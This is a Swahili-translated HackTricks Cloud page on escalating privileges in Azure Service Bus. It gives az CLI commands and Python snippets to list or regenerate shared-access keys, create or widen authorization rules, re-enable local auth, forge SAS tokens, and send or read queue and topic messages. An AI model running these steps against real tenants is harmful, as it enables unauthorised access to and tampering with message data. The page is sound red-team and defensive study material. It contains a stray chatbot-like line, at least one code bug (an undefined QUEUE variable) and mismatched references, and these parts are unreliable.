HackTricks CloudAz - Service Bus Privesc
Reading time: 12 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Service Bus
Kwa maelezo zaidi angalia:
Microsoft.ServiceBus/namespaces/authorizationrules/listKeys/action AU Microsoft.ServiceBus/namespaces/authorizationrules/regenerateKeys/action
Ruhusa hizi zinakuwezesha kupata au kuunda upya funguo za sheria za mamlaka za ndani ndani ya jina la nafasi ya Service Bus. Kutumia funguo hizi inawezekana kuthibitisha kama jina la nafasi ya Service Bus, na kukuwezesha kutuma ujumbe kwa foleni au mada yoyote, kupokea ujumbe kutoka kwa foleni au usajili wowote, au kwa uwezekano kuingiliana na mfumo kwa njia ambazo zinaweza kuharibu shughuli, kujifanya kuwa watumiaji halali, au kuingiza data mbaya katika mchakato wa ujumbe.
Kumbuka kwamba kwa default RootManageSharedAccessKey sheria ina udhibiti kamili juu ya jina la nafasi ya Service Bus na inatumika na az cli, hata hivyo, sheria nyingine zenye thamani nyingine za funguo zinaweza kuwepo.
# List keys
az servicebus namespace authorization-rule keys list --resource-group <res-group> --namespace-name <namespace-name> --authorization-rule-name RootManageSharedAccessKey [--authorization-rule-name RootManageSharedAccessKey]
# Regenerate keys
az servicebus namespace authorization-rule keys renew --key [PrimaryKey|SecondaryKey] --resource-group <res-group> --namespace-name <namespace-name> [--authorization-rule-name RootManageSharedAccessKey]
Microsoft.ServiceBus/namespaces/AuthorizationRules/write
Kwa ruhusa hii inawezekana kuunda sheria mpya ya ruhusa yenye ruhusa zote na funguo zake mwenyewe kwa:
az servicebus namespace authorization-rule create --authorization-rule-name "myRule" --namespace-name mynamespacespdemo --resource-group Resource_Group_1 --rights Manage Listen Send
[!WARNING] Amri hii haitajibu na funguo, hivyo unahitaji kuzipata kwa amri za awali (na ruhusa) ili kupandisha mamlaka.
Zaidi ya hayo, kwa amri hiyo (na Microsoft.ServiceBus/namespaces/authorizationRules/read) ikiwa utatekeleza kitendo hiki kupitia Azure CLI, inawezekana kuboresha sheria ya ruhusa iliyopo na kuipa ruhusa zaidi (ikiwa ilikosa baadhi) kwa amri ifuatayo:
az servicebus namespace authorization-rule update \
--resource-group <MyResourceGroup> \
--namespace-name <MyNamespace> \
--name RootManageSharedAccessKey \
--rights Manage Listen Send
Microsoft.ServiceBus/namespaces/[queues|topics]/authorizationRules/ListKeys/action AU Microsoft.ServiceBus/namespaces/[queues|topics]/authorizationRules/regenerateKeys/action
Mada maalum na foleni ndani ya jina la nafasi ya Service Bus zinaweza kuwa na sheria zao zaidhini, ambazo zinaweza kutumika kudhibiti ufikiaji wa chombo hicho. Kwa kuwa na ruhusa hizi, unaweza kupata au kuunda upya funguo za sheria hizi zaidhini za ndani, na kukuwezesha kuthibitisha kama chombo hicho na kwa uwezekano kutuma au kupokea ujumbe, kusimamia usajili, au kuingiliana na mfumo kwa njia ambazo zinaweza kuharibu shughuli, kuiga watumiaji halali, au kuingiza data mbaya katika mchakato wa ujumbe.
# List keys (topics)
az servicebus topic authorization-rule keys list --resource-group <res-group> --namespace-name <namespace-name> --topic-name <topic-name> --name <auth-rule-name>
# Regenerate keys (topics)
az servicebus topic authorization-rule keys renew --key [PrimaryKey|SecondaryKey] --resource-group <res-group> --namespace-name <namespace-name> --topic-name <topic-name> --name <auth-rule-name>
# List keys (queues)
az servicebus queue authorization-rule keys list --resource-group <res-group> --namespace-name <namespace-name> --queue-name <queue-name> --name <auth-rule-name>
# Regenerate keys (queues)
az servicebus queue authorization-rule keys renew --key [PrimaryKey|SecondaryKey] --resource-group <res-group> --namespace-name <namespace-name> --queue-name <queue-name> --name <auth-rule-name>
Microsoft.ServiceBus/namespaces/[queues|topics]/authorizationRules/write
Kwa ruhusa hii inawezekana kuunda sheria mpya ya idhini yenye ruhusa zote na funguo zake mwenyewe kwa:
# In a topic
az servicebus topic authorization-rule create --resource-group <res-group> --namespace-name <namespace-name> --topic-name <topic-name> --name <auth-rule-name> --rights Manage Listen Send
# In a queue
az servicebus queue authorization-rule create --resource-group <res-group> --namespace-name <namespace-name> --queue-name <queue-name> --name <auth-rule-name> --rights Manage Listen Send
[!WARNING] Amri hii haitajibu na funguo, hivyo unahitaji kuzipata kwa amri za awali (na ruhusa) ili kupandisha mamlaka.
Zaidi ya hayo, kwa amri hiyo (na Microsoft.ServiceBus/namespaces/[queues|topics]/authorizationRules/read) ikiwa utatekeleza kitendo hiki kupitia Azure CLI, inawezekana kuboresha sheria ya ruhusa iliyopo na kuipa ruhusa zaidi (ikiwa ilikosa baadhi) kwa amri ifuatayo:
# In a topic
az servicebus topic authorization-rule update --resource-group <res-group> --namespace-name <namespace-name> --topic-name <topic-name> --name <auth-rule-name> --rights Manage Listen Send
# In a queue
az servicebus queue authorization-rule update --resource-group <res-group> --namespace-name <namespace-name> --queue-name <queue-name> --name <auth-rule-name> --rights Manage Listen Send
Microsoft.ServiceBus/namespaces/write (& Microsoft.ServiceBus/namespaces/read ikiwa az cli inatumika)
Kwa ruhusa hizi mshambuliaji anaweza kurejesha "uthibitishaji wa ndani" kwa amri ifuatayo na hivyo funguo zote kutoka kwa sera za pamoja zitaweza kufanya kazi.
az servicebus namespace update --disable-local-auth false -n <namespace-name> --resource-group <res-group>
Tuma Ujumbe na funguo (Microsoft.ServiceBus/namespaces/[queues|topics]/authorizationRules/ListKeys/action AU Microsoft.ServiceBus/namespaces/[queues|topics]/authorizationRules/regenerateKeys/action)
Unaweza kupata PrimaryConnectionString, ambayo inafanya kazi kama kitambulisho kwa ajili ya Service Bus namespace. Kwa kutumia uhusiano huu, unaweza kuthibitisha kikamilifu kama Service Bus namespace, na kukuwezesha kutuma ujumbe kwa foleni au mada yoyote na kwa uwezekano kuingiliana na mfumo kwa njia ambazo zinaweza kuharibu shughuli, kujifanya kuwa watumiaji halali, au kuingiza data mbaya katika mchakato wa ujumbe. Njia hii inafanya kazi ikiwa --disable-local-auth imewekwa kuwa false (hivyo uthibitisho wa ndani umewezeshwa).
import asyncio
from azure.servicebus.aio import ServiceBusClient
from azure.servicebus import ServiceBusMessage
# pip install azure-servicebus
NAMESPACE_CONNECTION_STR = "<PrimaryConnectionString>"
TOPIC_OR_QUEUE_NAME = "<TOPIC_OR_QUEUE_NAME>"
async def send_message():
async with ServiceBusClient.from_connection_string(NAMESPACE_CONNECTION_STR) as client:
async with client.get_topic_sender(topic_name=TOPIC_OR_QUEUE_NAME) as sender:
await sender.send_messages(ServiceBusMessage("Hacktricks-Training: Single Item"))
print("Sent message")
asyncio.run(send_message())
Zaidi ya hayo, unaweza kutuma ujumbe na az rest, katika kesi hii unahitaji kuunda token ya sas ili kuitumia.
import time, urllib.parse, hmac, hashlib, base64
def generate_sas_token(uri, key_name, key, expiry_in_seconds=3600):
expiry = int(time.time() + expiry_in_seconds)
string_to_sign = urllib.parse.quote_plus(uri) + "\n" + str(expiry)
signed_hmac_sha256 = hmac.new(key.encode('utf-8'), string_to_sign.encode('utf-8'), hashlib.sha256).digest()
signature = urllib.parse.quote_plus(base64.b64encode(signed_hmac_sha256))
token = f"SharedAccessSignature sr={urllib.parse.quote_plus(uri)}&sig={signature}&se={expiry}&skn={key_name}"
return token
# Replace these with your actual values
resource_uri = "https://<namespace>.servicebus.windows.net/<queue_or_topic>"
key_name = "<SharedKeyName>"
primary_key = "<PrimaryKey>"
sas_token = generate_sas_token(resource_uri, key_name, primary_key)
print(sas_token)
az rest --method post \
--uri "https://<NAMESPACE>.servicebus.windows.net/<queue>/messages" \
--headers "Content-Type=application/atom+xml;type=entry;charset=utf-8" "Authorization=SharedAccessSignature sr=https%3A%2F%2F<NAMESPACE>.servicebus.windows.net%2F<TOPIC_OR_QUEUE_NAME>&sig=<SIGNATURE>&se=<EXPIRY>&skn=<KEYNAME>" \
--body "<MESSAGE_BODY>"
Receive with keys (Microsoft.ServiceBus/namespaces/[queues|topics]/authorizationRules/ListKeys/action OR Microsoft.ServiceBus/namespaces/[queues|topics]/authorizationRules/regenerateKeys/action)
Unaweza kupata PrimaryConnectionString, ambayo inatumika kama akiba kwa ajili ya Service Bus namespace. Kwa kutumia hii connection string, unaweza kupokea ujumbe kutoka kwa foleni au usajili wowote ndani ya namespace, ikiruhusu ufikiaji wa data ambayo inaweza kuwa nyeti au muhimu, ikiruhusu uhamasishaji wa data, au kuingilia kati mchakato wa ujumbe na workflows za programu. Njia hii inafanya kazi ikiwa --disable-local-auth imewekwa kuwa false.
import asyncio
from azure.servicebus.aio import ServiceBusClient
# pip install azure-servicebus
CONN_STR = "<PrimaryConnectionString>"
QUEUE = "<QUEUE_NAME>"
# For topics/subscriptions, you would use:
# TOPIC = "<TOPIC_NAME>"
# SUBSCRIPTION = "<TOPIC_SUBSCRIPTION_NAME>"
async def receive():
async with ServiceBusClient.from_connection_string(CONN_STR) as client:
# For a queue receiver:
async with client.get_queue_receiver(queue_name=QUEUE, max_wait_time=5) as receiver:
msgs = await receiver.receive_messages(max_wait_time=5, max_message_count=20)
for msg in msgs:
print("Received:", msg)
await receiver.complete_message(msg)
# For a topic/subscription receiver (commented out):
# async with client.get_subscription_receiver(topic_name=TOPIC, subscription_name=SUBSCRIPTION, max_wait_time=5) as receiver:
# msgs = await receiver.receive_messages(max_wait_time=5, max_message_count=20)
# for msg in msgs:
# print("Received:", msg)
# await receiver.complete_message(msg)
asyncio.run(receive())
print("Done receiving messages")
Zaidi ya hayo, unaweza kutuma ujumbe na az rest, katika kesi hii unahitaji kuzalisha token ya sas kutumia.
import time, urllib.parse, hmac, hashlib, base64
def generate_sas_token(uri, key_name, key, expiry_in_seconds=3600):
expiry = int(time.time() + expiry_in_seconds)
string_to_sign = urllib.parse.quote_plus(uri) + "\n" + str(expiry)
signature = urllib.parse.quote_plus(base64.b64encode(
hmac.new(key.encode('utf-8'), string_to_sign.encode('utf-8'), hashlib.sha256).digest()
))
token = f"SharedAccessSignature sr={urllib.parse.quote_plus(uri)}&sig={signature}&se={expiry}&skn={key_name}"
return token
# Example usage:
resource_uri = "https://<namespace>.servicebus.windows.net/queue" # For queue
# resource_uri = "https://<namespace>.servicebus.windows.net/<topic>/subscriptions/<subscription>" # For topic subscription
sas_token = generate_sas_token(resource_uri, "<KEYNAME>", "<PRIMARY_KEY>")
print(sas_token)
Kwa foleni unaweza kupata au kuangalia ujumbe (kupata ujumbe kutafuta kuondoa, wakati kuangalia hakutafanya hivyo):
#Get a message
az rest --method post \
--uri "https://<NAMESPACE>.servicebus.windows.net/<QUEUE>/messages/head?timeout=60" \
--headers "Content-Type=application/atom+xml;type=entry;charset=utf-8" "Authorization=SharedAccessSignature sr=<URI_ENCODED_RESOURCE>&sig=<SIGNATURE>&se=<EXPIRY>&skn=<KEYNAME>"
#Peek a message
az rest --method get \
--uri "https://<NAMESPACE>.servicebus.windows.net/<QUEUE>/messages/head?peekonly=true&timeout=60" \
--headers "Authorization=SharedAccessSignature sr=<URI_ENCODED_RESOURCE>&sig=<SIGNATURE>&se=<EXPIRY>&skn=<KEYNAME>"
#You can select the meesage changing the field PreviousSequenceNumber
az rest --method get \
--uri "https://<NAMESPACE>.servicebus.windows.net/<ENTITY>/messages?timeout=60&PreviousSequenceNumber=<LAST_SEQUENCE_NUMBER>&api-version=2017-04" \
--headers "Authorization=SharedAccessSignature sr=<URI_ENCODED_RESOURCE>&sig=<SIGNATURE>&se=<EXPIRY>&skn=<KEYNAME>"
Samahani, naweza kusaidia vipi?
#Get a message
az rest --method post \
--uri "https://<NAMESPACE>.servicebus.windows.net/<TOPIC>/subscriptions/<SUBSCRIPTION>/messages/head?timeout=60" \
--headers "Content-Type=application/atom+xml;type=entry;charset=utf-8" "Authorization=SharedAccessSignature sr=<URI_ENCODED_RESOURCE>&sig=<SIGNATURE>&se=<EXPIRY>&skn=<KEYNAME>"
#Peek a message
az rest --method get \
--uri "https://<NAMESPACE>.servicebus.windows.net/<TOPIC>/subscriptions/<SUBSCRIPTION>/messages/head?timeout=60&api-version=2017-04" \
--headers "Authorization=SharedAccessSignature sr=<URI_ENCODED_RESOURCE>&sig=<SIGNATURE>&se=<EXPIRY>&skn=<KEYNAME>"
#You can select the meesage changing the field PreviousSequenceNumber
az rest --method get \
--uri "https://<NAMESPACE>.servicebus.windows.net/<TOPIC>/subscriptions/<SUBSCRIPTION>/messages?timeout=60&PreviousSequenceNumber=<LAST_SEQUENCE_NUMBER>&api-version=2017-04" \
--headers "Authorization=SharedAccessSignature sr=<URI_ENCODED_RESOURCE>&sig=<SIGNATURE>&se=<EXPIRY>&skn=<KEYNAME>"
Tuma Ujumbe. DataActions: Microsoft.ServiceBus/namespaces/messages/send/action
Unaweza kutumia ruhusa hii kutuma ujumbe, hata kama --disable-local-auth imewekwa kuwa kweli.
import asyncio
from azure.identity.aio import DefaultAzureCredential
from azure.servicebus.aio import ServiceBusClient
from azure.servicebus import ServiceBusMessage
# pip install azure-servicebus
NS = "<namespace>.servicebus.windows.net" # Your namespace
QUEUE_OR_TOPIC = "<QUEUE_OR_TOPIC>" # Your queue name
async def run():
credential = DefaultAzureCredential()
async with ServiceBusClient(fully_qualified_namespace=NS, credential=credential) as client:
#async with client.get_topic_sender(topic_name=TOPIC) as sender: # Use this to send the message to a topic
async with client.get_queue_sender(queue_name=QUEUE) as sender:
await sender.send_messages(ServiceBusMessage("Single Message"))
print("Sent a single message")
await credential.close()
if __name__ == "__main__":
asyncio.run(run())
Pokea Ujumbe. DataActions: Microsoft.ServiceBus/namespaces/messages/receive/action
Unaweza kutumia ruhusa hii kupokea ujumbe, hata kama --disable-local-auth imewekwa kuwa kweli.
import asyncio
from azure.identity.aio import DefaultAzureCredential
from azure.servicebus.aio import ServiceBusClient
# pip install azure-servicebus
NS = "<namespace>.servicebus.windows.net"
QUEUE = "<QUEUE>"
# For a topic subscription, uncomment and set these values:
# TOPIC = "<TOPIC>"
# SUBSCRIPTION = "<SUBSCRIPTION>"
async def run():
credential = DefaultAzureCredential()
async with ServiceBusClient(fully_qualified_namespace=NS, credential=credential) as client:
# Receiving from a queue:
async with client.get_queue_receiver(queue_name=QUEUE, max_wait_time=5) as receiver:
async for msg in receiver:
print("Received from Queue:", msg)
await receiver.complete_message(msg)
# To receive from a topic subscription, uncomment the code below and comment out the queue receiver above:
# async with client.get_subscription_receiver(topic_name=TOPIC, subscription_name=SUBSCRIPTION, max_wait_time=5) as receiver:
# async for msg in receiver:
# print("Received from Topic Subscription:", msg)
# await receiver.complete_message(msg)
await credential.close()
asyncio.run(run())
print("Done receiving messages")
References
- https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues
- https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api
- https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes
- https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless
- https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.